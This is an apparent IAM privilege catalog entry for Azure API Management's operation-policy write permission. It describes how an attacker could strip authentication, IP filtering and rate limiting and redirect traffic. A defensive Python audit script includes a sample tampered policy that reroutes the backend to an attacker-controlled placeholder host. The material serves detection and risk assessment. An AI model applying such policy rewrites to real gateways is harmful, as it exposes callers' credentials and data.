services / Azure / API Management API operation policies

The policy configuration (XML) applied at the API operation level on an Azure API Management gateway, controlling inbound/outbound request processing such as authentication, authorization, rate limiting, IP filtering, and backend routing.

APIM operation policy XML acts as the gateway's enforcement layer and frequently references or embeds secret material (named-value references, authorization headers, backend credentials, tokens).


Microsoft.ApiManagement/service/apis/operations/policies/write

Writing an operation policy replaces the operation's entire policy document. An attacker holding this permission can therefore drop the validate-jwt, ip-filter and rate-limit elements from the inbound section, add a set-backend-service element that redirects the operation to a host they control (receiving forwarded credentials, request bodies and any named-value secrets the policy injects into headers), or rewrite request and response handling in the inbound and outbound sections, both disabling defenses and manipulating gateway behavior for every caller of that operation.
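As an added example (not part of the P0 catalog entry or of any Microsoft tooling), the following Python audit compares an operation's deployed policy XML against the policy its owners expect and reports the two tampering patterns this permission enables: enforcement elements removed from the inbound section and the backend rerouted. Both policy documents are constructed samples; the hostnames, audience, address range and named-value names are placeholders, not real infrastructure.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the policy the owners expect on a protected operation.
# {{tenant-id}} is an APIM named-value reference; hosts and audience are placeholders.
EXPECTED_POLICY = """<policies>
  <inbound>
    <base />
    <validate-jwt header-name="Authorization" failed-validation-httpcode="401">
      <openid-config url="https://login.microsoftonline.com/{{tenant-id}}/v2.0/.well-known/openid-configuration" />
      <audiences><audience>api://orders</audience></audiences>
    </validate-jwt>
    <ip-filter action="allow">
      <address-range from="10.0.0.0" to="10.0.255.255" />
    </ip-filter>
    <rate-limit calls="100" renewal-period="60" />
    <set-backend-service base-url="https://orders-backend.internal.example" />
  </inbound>
  <backend><base /></backend>
  <outbound><base /></outbound>
  <on-error><base /></on-error>
</policies>"""

# Constructed sample: the same operation after a policies/write by an attacker who
# stripped enforcement and pointed the operation at a host they control.
TAMPERED_POLICY = """<policies>
  <inbound>
    <base />
    <set-backend-service base-url="https://attacker-controlled.example" />
  </inbound>
  <backend><base /></backend>
  <outbound><base /></outbound>
  <on-error><base /></on-error>
</policies>"""

# Inbound policy elements that enforce authentication, authorization, source
# restriction or throttling. Absence of an expected one is a finding.
ENFORCEMENT_TAGS = (
    "validate-jwt",
    "validate-azure-ad-token",
    "check-header",
    "ip-filter",
    "rate-limit",
    "rate-limit-by-key",
    "quota",
)
AUTH_TAGS = ("validate-jwt", "validate-azure-ad-token", "check-header")


def inbound_tags(policy_xml):
    """Return the element names in the <inbound> section, in document order."""
    root = ET.fromstring(policy_xml)
    inbound = root.find("inbound")
    return [child.tag for child in inbound] if inbound is not None else []


def backend_url(policy_xml):
    """Return the base-url of an inbound set-backend-service element, or None."""
    el = ET.fromstring(policy_xml).find("./inbound/set-backend-service")
    return el.get("base-url") if el is not None else None


def audit_policy(expected_xml, actual_xml):
    """Compare a deployed operation policy with the expected one.

    Returns a dict of findings: which expected enforcement elements are gone,
    whether any authentication element survives, and whether the backend moved.
    """
    expected = set(inbound_tags(expected_xml))
    actual = set(inbound_tags(actual_xml))
    missing = sorted(t for t in ENFORCEMENT_TAGS if t in expected and t not in actual)
    exp_backend, act_backend = backend_url(expected_xml), backend_url(actual_xml)
    return {
        "missing_enforcement": missing,
        "auth_present": any(t in actual for t in AUTH_TAGS),
        "backend_changed": exp_backend != act_backend,
        "expected_backend": exp_backend,
        "actual_backend": act_backend,
    }


if __name__ == "__main__":
    for label, xml in (("expected", EXPECTED_POLICY), ("tampered", TAMPERED_POLICY)):
        print(label, audit_policy(EXPECTED_POLICY, xml))
```

In practice the "actual" document is the policy resource this permission writes (the operation's policies/policy child resource, retrievable through the ARM API or exported from the portal), and a write to it by an identity outside the deployment pipeline, visible in the Activity Log under the operation name above, is itself worth alerting on before the diff is even inspected.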

Risks

Scope: HIGH

This privilege may grant access to sensitive data from a single organizational function, or allow interruption of a service supporting a single organizational function.

Links

  • https://azure.permissions.cloud/iam/Microsoft.ApiManagement
  • https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
  • Contributed by P0 Security

    © 2023–present P0 Security and contributors to the IAM Privilege Catalog